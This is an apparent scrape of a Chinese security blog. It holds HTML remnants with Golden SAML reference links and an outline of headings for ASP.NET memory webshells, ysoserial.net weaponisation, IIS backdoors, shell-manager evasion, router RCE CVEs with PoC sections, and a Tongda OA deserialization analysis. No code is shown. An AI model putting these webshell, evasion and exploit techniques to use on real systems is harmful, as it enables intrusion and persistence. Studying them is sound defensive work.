href="https://aadinternals.com/post/adfs/" target="_blank">https://aadinternals.com/post/adfs/</a></span></p><p cid="n154" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://nodauf.dev/p/practical-guide-for-golden-saml/" target="_blank">https://nodauf.dev/p/practical-guide-for-golden-saml/</a></span></p><p cid="n155" mdtype="paragraph" style="box-sizing: border-box;line-height: inherit;orphans: 4;margin-top: 0.8em;margin-bottom: 0.8em;white-space: pre-wrap;font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;font-size: 16px;text-align: start;"><span md-inline="url" spellcheck="false" style="box-sizing: border-box;word-break: break-all;"><a href="https://www.netwrix.com/golden_saml_attack.html" target="_blank">https://www.netwrix.com/golden_saml_attack.html</a></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p></p>
<p></p>



<p><a href="2247483773">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=813fdfc6&r=1&u=http%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyOTI5MTM4OQ%3D%3D%26mid%3D2247483773%26idx%3D1%26sn%3D5ac758643cc01c38b542dca757e735d4">跳转微信打开</a></p>

</article>
</main></body></html>

IndexSec

寻找Http Module内存马并ysoserial.net武器化

ysoserial.net加载过程

改造内存马

Route

Http Module

http module介绍

创建一个http module

" + "HelloWorldModule: Beginning of Request" + "

" + "HelloWorldModule: End of Request

module init

事件挂载

参考链接

ASP.NET 内存马与魔改蚁剑内存马回显

测试环境

官方文档

种马方式

Framework

filter

MVC5 新filter接口

检测手段

route

派生RouteBase

GetRouteData

GetVirtualPath

添加Route类

GetHttpHandler

IHttpHandler

listener

前置条件

Not Found

使用方法

virtualPath

viewstate

使用条件

原理

测试环境

sessionstate

前置条件

非Framework

iis后门（appcmd）

预编译问题

Shell管理工具及免杀

直接使用cmd

蚁剑

VirtualPath

参考文章

某路由器RCE漏洞分析

下载地址

使用手册

厂商漏洞列表

架构

环境搭建失败

漏洞

最新版本漏洞，疑似CVE-2023-24229

版本要求 1.5.1.4，作者已删除poc,根据谷歌镜像获得

最新版本漏洞，CVE-2023-1009

版本要求

CVE-2020-8515

版本要求

poc

CVE-2020-14472

版本要求

全poc

CVE-2020-15415

poc

[无真实poc]CVE-2020-19664

[无poc]CNVD-2021-28718

[无poc]CNVD-2021-28719

[无poc]CVE-2021-43118

通达OA <12.4 反序列化漏洞分析

0x00 前置知识和准备

1.yii版本和源码准备

2.yii csrftoken配置方法

3.yii csrftoken http报文格式

0x01 漏洞分析

1.反序列化触发点csrfMetaTags

2.通达OA调用csrfMetaTags的地方